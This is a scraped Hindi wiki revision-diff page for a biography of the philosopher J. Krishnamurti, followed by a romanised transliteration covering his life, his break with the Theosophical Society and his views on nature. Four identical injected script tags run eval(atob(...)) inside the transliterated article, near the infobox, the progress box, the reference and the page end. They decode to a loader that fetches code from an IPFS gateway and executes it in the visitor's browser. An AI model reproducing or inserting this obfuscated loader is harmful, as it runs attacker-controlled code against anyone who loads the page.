Difference between revisions of "जे. कृष्णमूर्ति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
|जन्म भूमि=[[तमिलनाडु]]
 
|जन्म भूमि=[[तमिलनाडु]]
 
|मृत्यु=[[17 फ़रवरी]], [[1986]] ई.
 
|मृत्यु=[[17 फ़रवरी]], [[1986]] ई.
|मृत्यु स्थान=
+
|मृत्यु स्थान=कैलिफोर्निया
 
|अविभावक=[[पिता]]- 'जिद्दू नारायनिया', [[माता]]- 'संजीवामा'
 
|अविभावक=[[पिता]]- 'जिद्दू नारायनिया', [[माता]]- 'संजीवामा'
 
|पति/पत्नी=
 
|पति/पत्नी=
Line 13: Line 13:
 
|गुरु=
 
|गुरु=
 
|कर्म भूमि=[[भारत]] और [[इंग्लैंड]]
 
|कर्म भूमि=[[भारत]] और [[इंग्लैंड]]
|कर्म-क्षेत्र=
+
|कर्म-क्षेत्र=दार्शनिक
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
 
|विषय=
 
|विषय=
Line 39: Line 39:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
+
'''जे. कृष्णमूर्ति''' (पूरा नाम: 'जिद्दू कृष्णमूर्ति', [[अंग्रेज़ी]]: ''Jiddu Krishnamurti'', जन्म: [[12 मई]], [[1895]] - मृत्यु: [[17 फ़रवरी]], [[1986]]) एक विश्व प्रसिद्ध दार्शनिक तथा आध्यात्मिक विषयों के बड़े ही कुशल एवं परिपक्व लेखक थे। इन्हें प्रवचनकर्ता के रूप में भी ख्याति प्राप्त थी। जे. कृष्णमूर्ति मानसिक क्रान्ति, बुद्धि की प्रकृति, [[ध्यान]] और समाज में सकारात्मक परिवर्तन किस प्रकार लाया जा सकता है, इन विषयों आदि के बहुत ही गहरे विशेषज्ञ थे।
'''जे. कृष्णमूर्ति''' या 'जिद्दू कृष्णमूर्ति' (जन्म- [[12 मई]], [[1895]] ई. [[तमिलनाडु]] तथा मृत्यु- [[17 फ़रवरी]], [[1986]] ई.) एक दार्शनिक तथा आध्यात्मिक विषयों के बड़े ही कुशल एवं परिपक्व लेखक थे। इन्हें प्रवचनकर्ता के रूप में भी ख्याति प्राप्त थी। जे. कृष्णमूर्ति मानसिक क्रान्ति, बुद्धि की प्रकृति, [[ध्यान]] और समाज में सकारात्मक परिवर्तन किस प्रकार लाया जा सकता है, इन विषयों आदि के बहुत ही गहरे विशेषज्ञ थे।
 
 
==परिचय==
 
==परिचय==
 
जे. कृष्णमूर्ति का जन्म तमिलनाडु के एक छोटे-से नगर में निर्धन [[ब्राह्मण]] परिवार में हुआ था। इनके पिता 'जिद्दू नारायनिया' [[ब्रिटिश शासन|ब्रिटिश प्रशासन]] में सरकारी कर्मचारी थे। जब कृष्णमूर्ति केवल दस [[साल]] के ही थे, तभी इनकी माता 'संजीवामा' का निधन हो गया। बचपन से ही इनमें कुछ असाधारणता थी। [[थियोसोफ़िकल सोसाइटी]] के सदस्य पहले ही किसी विश्वगुरु के आगमन की भविष्यवाणी कर चुके थे। श्रीमती [[एनी बेसेंट]] और थियोसोफ़िकल सोसाइटी के प्रमुखों को जे. कृष्णमूर्ति में वह विशिष्ट लक्षण दिखाई दिये, जो कि एक विश्वगुरु में होते हैं। एनी बेसेंट ने जे. कृष्णमूर्ति की किशोरावस्था में ही उन्हें गोद ले लिया और उनकी परवरिश पूर्णतया [[धर्म]] और आध्यात्म से ओत-प्रोत वातावरण में हुई।
 
जे. कृष्णमूर्ति का जन्म तमिलनाडु के एक छोटे-से नगर में निर्धन [[ब्राह्मण]] परिवार में हुआ था। इनके पिता 'जिद्दू नारायनिया' [[ब्रिटिश शासन|ब्रिटिश प्रशासन]] में सरकारी कर्मचारी थे। जब कृष्णमूर्ति केवल दस [[साल]] के ही थे, तभी इनकी माता 'संजीवामा' का निधन हो गया। बचपन से ही इनमें कुछ असाधारणता थी। [[थियोसोफ़िकल सोसाइटी]] के सदस्य पहले ही किसी विश्वगुरु के आगमन की भविष्यवाणी कर चुके थे। श्रीमती [[एनी बेसेंट]] और थियोसोफ़िकल सोसाइटी के प्रमुखों को जे. कृष्णमूर्ति में वह विशिष्ट लक्षण दिखाई दिये, जो कि एक विश्वगुरु में होते हैं। एनी बेसेंट ने जे. कृष्णमूर्ति की किशोरावस्था में ही उन्हें गोद ले लिया और उनकी परवरिश पूर्णतया [[धर्म]] और आध्यात्म से ओत-प्रोत वातावरण में हुई।
 
====शिक्षा====
 
====शिक्षा====
 
थियोसोफ़िकल सोसाइटी के प्रमुख को लगा कि जे. कृष्णमूर्ति जैसे व्यक्तित्व का धनी ही विश्व का शिक्षक बन सकता है। एनी बेसेंट ने भी इस विचार का समर्थन किया और जिद्दू कृष्णमूर्ति को वे अपने छोटे भाई की तरह मानने लगीं। [[1912]] में उन्हें शिक्षा के लिए [[इंग्लैंड]] भेजा गया और [[1921]] तक वे वहाँ रहे। इसके बाद विभिन्न देशों में थियोसोफ़िकल पर भाषण देने का क्रम चलता रहा। जे. कृष्णमूर्ति ने सदैव ही इस बात पर बल दिया था कि प्रत्येक मनुष्य को मानसिक क्रान्ति की आवश्यकता है और उनका यह भी मत था कि इस तरह की क्रान्ति किन्हीं बाह्य कारक से सम्भव नहीं है। चाहे वह धार्मिक, राजनैतिक या सामाजिक किसी भी प्रकार की हो।
 
थियोसोफ़िकल सोसाइटी के प्रमुख को लगा कि जे. कृष्णमूर्ति जैसे व्यक्तित्व का धनी ही विश्व का शिक्षक बन सकता है। एनी बेसेंट ने भी इस विचार का समर्थन किया और जिद्दू कृष्णमूर्ति को वे अपने छोटे भाई की तरह मानने लगीं। [[1912]] में उन्हें शिक्षा के लिए [[इंग्लैंड]] भेजा गया और [[1921]] तक वे वहाँ रहे। इसके बाद विभिन्न देशों में थियोसोफ़िकल पर भाषण देने का क्रम चलता रहा। जे. कृष्णमूर्ति ने सदैव ही इस बात पर बल दिया था कि प्रत्येक मनुष्य को मानसिक क्रान्ति की आवश्यकता है और उनका यह भी मत था कि इस तरह की क्रान्ति किन्हीं बाह्य कारक से सम्भव नहीं है। चाहे वह धार्मिक, राजनैतिक या सामाजिक किसी भी प्रकार की हो।
 +
==कृष्णमूर्ति के विचार==
 +
[[1927]] में एनी बेसेंट ने उन्हें 'विश्व गुरु' घोषित किया। किन्तु दो वर्ष बाद ही कृष्णमूर्ति ने थियोसोफ़िकल विचारधारा से नाता तोड़कर अपने नये दृष्टिकोण का प्रतिपादन आरम्भ कर दिया। अब उन्होंने अपने स्वतंत्र विचार देने शुरू कर दिये। उनका कहना था कि व्यक्तित्व के पूर्ण रूपान्तरण से ही विश्व से संघर्ष और पीड़ा को मिटाया जा सकता है। हम अन्दर से अतीत का बोझ और भविष्य का भय हटा दें और अपने मस्तिष्क को मुक्त रखें। उन्होंने 'आर्डर ऑफ़ द स्टार' को भंग करते हुए कहा कि 'अब से कृपा करके याद रखें कि मेरा कोई शिष्य नहीं हैं, क्योंकि गुरु तो सच को दबाते हैं। सच तो स्वयं तुम्हारे भीतर है।...सच को ढूँढने के लिए मनुष्य को सभी बंधनों से स्वतंत्र होना आवश्यक है।' कृष्णमूर्ति ने बड़ी ही फुर्ती और जीवटता से लगातार दुनिया के अनेकों भागों में भ्रमण किया और लोगों को शिक्षा दी और लोगों से शिक्षा ली। उन्होंने पूरा जीवन एक शिक्षक और छात्र की तरह बिताया। मनुष्य के सर्वप्रथम मनुष्य होने से ही मुक्ति की शुरुआत होती है, किंतु आज का मानव [[हिन्दू]], [[बौद्ध]], [[ईसाई]], [[मुस्लिम]], अमेरिकी या अरबी है। उन्होंने कहा था कि संसार विनाश की राह पर आ चुका है और इसका हल तथाकथित धार्मिकों और राजनीतिज्ञों के पास नहीं है।
 +
===जीवन का लक्ष्य===
 +
अब यह कुछ ऐसी वास्तविकता है जिसे मैं निश्चित होकर कह सकता हूँ कि मैंने उपलब्ध किया है। मेरे लिये, यह कोई सैद्धांतिक संकल्पना नहीं है। यह मेरे जीवन का अनुभव है, सुनिश्चित, वास्तविक और ठोस। इसलिए मैं इसकी उपलब्धि के लिए क्या आवश्यक है, यह कह सकता हूँ। और मैं कहता हूँ कि पहली चीज़ यह है कि हम जो है उसे वैसा का वैसा ही पहचाने यानि अपनी पूर्णता में कोई इच्छा क्या हो जायेगी, और तब प्रत्येक क्षण के अवलोकन में स्वयं को अनुशासित करें, जैसे कोई अपनी इच्छाओं को ख़ुद ही देखे, और उन्हें उस अवैयक्तिक प्रेम की ओर निर्दिष्ट करे, जो कि उसकी स्वयं की निष्पत्ति हो। जब अप निरंतर जागरूकता का अनुशासन स्थापित कर लेते हैं। उन सब चीज़ों का जो आप सोचते हैं, महसूस करते हैं और करते है (अमल में लाते हैं) का निरंतर अवलोकन हम में से अधिकतर के जीवन में उपस्थित दमन, ऊब, भ्रम से मुक्त कर, अवसरों की श्रंखला ले आता है जो हमें संपूर्णता की ओर प्रशस्त करती है। तो जीवन का लक्ष्य कुछ ऐसा नहीं जो कि बहुत दूर हो, जो कि दूर कहीं भविष्य में उपलब्ध करना है अपितु पल पल की, प्रत्येक क्षण की वास्तविकता, हर पल का यथार्थ जानने में है जो अभी अपनी अनन्तता सहित हमारे सामने साक्षात ही है।<ref name="सृजनगाथा"/>
 +
===प्रकृति से संबंध===
 +
किसी मनुष्य की मौत से अलग, अंततः किसी पेड़ की मौत बहुत ही ख़ूबसूरत होती है। किसी रेगिस्तान में एक मृत वृक्ष, उसकी धारियों वाली छाल, सूर्य की रोशनी और हवा से चमकी हुई उसकी देह, स्वर्ग की ओर उन्मुख नंगी टहनियाँ और तने। एक आश्चर्यजनक दृश्य होता है। एक सैकड़ों साल पुराना विशाल पेड़ बागड़ बनाने, फर्नीचर या घर बनाने या यूँ ही बगीचे की मिट्टी में खाद की तरह इस्तेमाल करने के लिए मिनटों में काट कर गिरा दिया जाता है। सौन्दर्य का ऐसा साम्राज्य मिनटों में नष्ट हो जाता है। मनुष्य चरागाह, खेती और निवास के लिए बस्तियाँ बनाने के लिए जंगलों में गहरे से गहरे प्रवेश कर उन्हें नष्ट कर चुका है। जंगल और उनमें बसने वाले जीव लुप्त होने लगे हैं। पर्वत श्रंखलाओं से घिरी ऐसी घाटियाँ जो शायद धरती पर सबसे पुरानी रही हों, जिनमें कभी चीते, [[भालू]] और हिरन दिखा करते थे अब पूरी तरह ख़त्म हो चुके हैं, बस आदमी ही बचा है जो हर तरफ दिखाई देता है। धरती की सुन्दरता तेज़ी से नष्ट और प्रदूषित की जा रही है। कारें और ऊँची बहुमंजिला इमारतें ऐसी जगहों पर दिख रही हैं जहां उनकी उम्मीद भी नहीं की जा सकती थी। जब आप प्रकृति और चहुं और फैले वृहत आकाश से अपने सम्बन्ध खो देते हैं, आप आदमी से भी रिश्ते ख़त्म कर चुके होते हैं।<ref name="सृजनगाथा">{{cite web |url=http://www.srijangatha.com/hastakshar_2May2k10#.UR-VpR0X5bt |title=जे. कृष्णमूर्ति- एक देदीप्यमान नक्षत्र |accessmonthday=16 फ़रवरी |accessyear= 2013|last= |first= |authorlink= |format= |publisher=सृजनगाथा |language=हिंदी }}</ref>
  
==स्वतंत्र विचार==
 
[[1927]] में एनी बेसेंट ने उन्हें 'विश्व गुरु' घोषित किया। किन्तु दो वर्ष बाद ही कृष्णमूर्ति ने थियोसोफ़िकल विचारधारा से नाता तोड़कर अपने नये दृष्टिकोण का प्रतिपादन आरम्भ कर दिया। अब उन्होंने अपने स्वतंत्र विचार देने शुरू कर दिये। उनका कहना था कि व्यक्तित्व के पूर्ण रूपान्तरण से ही विश्व से संघर्ष और पीड़ा को मिटाया जा सकता है। हम अन्दर से अतीत का बोझ और भविष्य का भय हटा दें और अपने मस्तिष्क को मुक्त रखें। उन्होंने 'आर्डर ऑफ़ द स्टार' को भंग करते हुए कहा कि 'अब से कृपा करके याद रखें कि मेरा कोई शिष्य नहीं हैं, क्योंकि गुरु तो सच को दबाते हैं। सच तो स्वयं तुम्हारे भीतर है।...सच को ढूँढने के लिए मनुष्य को सभी बंधनों से स्वतंत्र होना आवश्यक है।'
 
 
कृष्णमूर्ति ने बड़ी ही फुर्ती और जीवटता से लगातार दुनिया के अनेकों भागों में भ्रमण किया और लोगों को शिक्षा दी और लोगों से शिक्षा ली। उन्होंने पूरा जीवन एक शिक्षक और छात्र की तरह बिताया। मनुष्य के सर्वप्रथम मनुष्य होने से ही मुक्ति की शुरुआत होती है, किंतु आज का मानव [[हिन्दू]], [[बौद्ध]], [[ईसाई]], [[मुस्लिम]], अमेरिकी या अरबी है। उन्होंने कहा था कि संसार विनाश की राह पर आ चुका है और इसका हल तथाकथित धार्मिकों और राजनीतिज्ञों के पास नहीं है।
 
 
====निधन====
 
====निधन====
 
जिद्दू कृष्णमूर्ति की इस नई विचारधारा की ओर समाज का बौद्धिक वर्ग आकृष्ट हुआ और लोग पथ-प्रदर्शन के लिए उनके पास आने लगे थे। उन्होंने अपने जीवन काल में अनेक शिक्षा संस्थाओं की स्थापना की, जिनमें [[दक्षिण भारत]] का 'ऋषिवैली' स्कूल विशेष उल्लेखनीय है। [[भारत]] के इस महान व्यक्तित्व की 91 [[वर्ष]] की आयु में [[17 फ़रवरी]], [[1986]] ई. में मृत्यु हो गई।
 
जिद्दू कृष्णमूर्ति की इस नई विचारधारा की ओर समाज का बौद्धिक वर्ग आकृष्ट हुआ और लोग पथ-प्रदर्शन के लिए उनके पास आने लगे थे। उन्होंने अपने जीवन काल में अनेक शिक्षा संस्थाओं की स्थापना की, जिनमें [[दक्षिण भारत]] का 'ऋषिवैली' स्कूल विशेष उल्लेखनीय है। [[भारत]] के इस महान व्यक्तित्व की 91 [[वर्ष]] की आयु में [[17 फ़रवरी]], [[1986]] ई. में मृत्यु हो गई।

Revision as of 14:29, 16 February 2013

je. krishnamoorti
poora nam jiddoo krishnamoorti
janm 12 mee, 1895 ee.
janm bhoomi tamilanadu
mrityu 17 faravari, 1986 ee.
mrityu sthan kailiphorniya
karm bhoomi bharat aur ianglaiand
karm-kshetr darshanik
bhasha hindi, aangrezi
puraskar-upadhi vishvaguru
nagarikata bharatiy

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

je. krishnamoorti (poora nam: 'jiddoo krishnamoorti', aangrezi: Jiddu Krishnamurti, janm: 12 mee, 1895 - mrityu: 17 faravari, 1986) ek vishv prasiddh darshanik tatha adhyatmik vishayoan ke b de hi kushal evan paripakv lekhak the. inhean pravachanakarta ke roop mean bhi khyati prapt thi. je. krishnamoorti manasik kranti, buddhi ki prakriti, dhyan aur samaj mean sakaratmak parivartan kis prakar laya ja sakata hai, in vishayoan adi ke bahut hi gahare visheshajn the.

parichay

je. krishnamoorti ka janm tamilanadu ke ek chhote-se nagar mean nirdhan brahman parivar mean hua tha. inake pita 'jiddoo narayaniya' british prashasan mean sarakari karmachari the. jab krishnamoorti keval das sal ke hi the, tabhi inaki mata 'sanjivama' ka nidhan ho gaya. bachapan se hi inamean kuchh asadharanata thi. thiyosofikal sosaiti ke sadasy pahale hi kisi vishvaguru ke agaman ki bhavishyavani kar chuke the. shrimati eni beseant aur thiyosofikal sosaiti ke pramukhoan ko je. krishnamoorti mean vah vishisht lakshan dikhaee diye, jo ki ek vishvaguru mean hote haian. eni beseant ne je. krishnamoorti ki kishoravastha mean hi unhean god le liya aur unaki paravarish poornataya dharm aur adhyatm se ot-prot vatavaran mean huee.

shiksha

thiyosofikal sosaiti ke pramukh ko laga ki je. krishnamoorti jaise vyaktitv ka dhani hi vishv ka shikshak ban sakata hai. eni beseant ne bhi is vichar ka samarthan kiya aur jiddoo krishnamoorti ko ve apane chhote bhaee ki tarah manane lagian. 1912 mean unhean shiksha ke lie ianglaiand bheja gaya aur 1921 tak ve vahaan rahe. isake bad vibhinn deshoan mean thiyosofikal par bhashan dene ka kram chalata raha. je. krishnamoorti ne sadaiv hi is bat par bal diya tha ki pratyek manushy ko manasik kranti ki avashyakata hai aur unaka yah bhi mat tha ki is tarah ki kranti kinhian bahy karak se sambhav nahian hai. chahe vah dharmik, rajanaitik ya samajik kisi bhi prakar ki ho.

krishnamoorti ke vichar

1927 mean eni beseant ne unhean 'vishv guru' ghoshit kiya. kintu do varsh bad hi krishnamoorti ne thiyosofikal vicharadhara se nata to dakar apane naye drishtikon ka pratipadan arambh kar diya. ab unhoanne apane svatantr vichar dene shuroo kar diye. unaka kahana tha ki vyaktitv ke poorn roopantaran se hi vishv se sangharsh aur pi da ko mitaya ja sakata hai. ham andar se atit ka bojh aur bhavishy ka bhay hata dean aur apane mastishk ko mukt rakhean. unhoanne 'ardar aauf d star' ko bhang karate hue kaha ki 'ab se kripa karake yad rakhean ki mera koee shishy nahian haian, kyoanki guru to sach ko dabate haian. sach to svayan tumhare bhitar hai....sach ko dhooandhane ke lie manushy ko sabhi bandhanoan se svatantr hona avashyak hai.' krishnamoorti ne b di hi phurti aur jivatata se lagatar duniya ke anekoan bhagoan mean bhraman kiya aur logoan ko shiksha di aur logoan se shiksha li. unhoanne poora jivan ek shikshak aur chhatr ki tarah bitaya. manushy ke sarvapratham manushy hone se hi mukti ki shuruat hoti hai, kiantu aj ka manav hindoo, bauddh, eesaee, muslim, ameriki ya arabi hai. unhoanne kaha tha ki sansar vinash ki rah par a chuka hai aur isaka hal tathakathit dharmikoan aur rajanitijnoan ke pas nahian hai.

jivan ka lakshy

ab yah kuchh aisi vastavikata hai jise maian nishchit hokar kah sakata hooan ki maianne upalabdh kiya hai. mere liye, yah koee saiddhaantik sankalpana nahian hai. yah mere jivan ka anubhav hai, sunishchit, vastavik aur thos. isalie maian isaki upalabdhi ke lie kya avashyak hai, yah kah sakata hooan. aur maian kahata hooan ki pahali chiz yah hai ki ham jo hai use vaisa ka vaisa hi pahachane yani apani poornata mean koee ichchha kya ho jayegi, aur tab pratyek kshan ke avalokan mean svayan ko anushasit karean, jaise koee apani ichchhaoan ko khud hi dekhe, aur unhean us avaiyaktik prem ki or nirdisht kare, jo ki usaki svayan ki nishpatti ho. jab ap nirantar jagarookata ka anushasan sthapit kar lete haian. un sab chizoan ka jo ap sochate haian, mahasoos karate haian aur karate hai (amal mean late haian) ka nirantar avalokan ham mean se adhikatar ke jivan mean upasthit daman, oob, bhram se mukt kar, avasaroan ki shrankhala le ata hai jo hamean sanpoornata ki or prashast karati hai. to jivan ka lakshy kuchh aisa nahian jo ki bahut door ho, jo ki door kahian bhavishy mean upalabdh karana hai apitu pal pal ki, pratyek kshan ki vastavikata, har pal ka yatharth janane mean hai jo abhi apani anantata sahit hamare samane sakshat hi hai.[1]

prakriti se sanbandh

kisi manushy ki maut se alag, aantatah kisi pe d ki maut bahut hi khoobasoorat hoti hai. kisi registan mean ek mrit vriksh, usaki dhariyoan vali chhal, soory ki roshani aur hava se chamaki huee usaki deh, svarg ki or unmukh nangi tahaniyaan aur tane. ek ashcharyajanak drishy hota hai. ek saik doan sal purana vishal pe d bag d banane, pharnichar ya ghar banane ya yooan hi bagiche ki mitti mean khad ki tarah istemal karane ke lie minatoan mean kat kar gira diya jata hai. saundary ka aisa samrajy minatoan mean nasht ho jata hai. manushy charagah, kheti aur nivas ke lie bastiyaan banane ke lie jangaloan mean gahare se gahare pravesh kar unhean nasht kar chuka hai. jangal aur unamean basane vale jiv lupt hone lage haian. parvat shrankhalaoan se ghiri aisi ghatiyaan jo shayad dharati par sabase purani rahi hoan, jinamean kabhi chite, bhaloo aur hiran dikha karate the ab poori tarah khatm ho chuke haian, bas adami hi bacha hai jo har taraph dikhaee deta hai. dharati ki sundarata tezi se nasht aur pradooshit ki ja rahi hai. karean aur ooanchi bahumanjila imaratean aisi jagahoan par dikh rahi haian jahaan unaki ummid bhi nahian ki ja sakati thi. jab ap prakriti aur chahuan aur phaile vrihat akash se apane sambandh kho dete haian, ap adami se bhi rishte khatm kar chuke hote haian.[1]

nidhan

jiddoo krishnamoorti ki is nee vicharadhara ki or samaj ka bauddhik varg akrisht hua aur log path-pradarshan ke lie unake pas ane lage the. unhoanne apane jivan kal mean anek shiksha sansthaoan ki sthapana ki, jinamean dakshin bharat ka 'rrishivaili' skool vishesh ullekhaniy hai. bharat ke is mahan vyaktitv ki 91 varsh ki ayu mean 17 faravari, 1986 ee. mean mrityu ho gee.  

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 je. krishnamoorti- ek dedipyaman nakshatr (hiandi) srijanagatha. abhigaman tithi: 16 faravari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>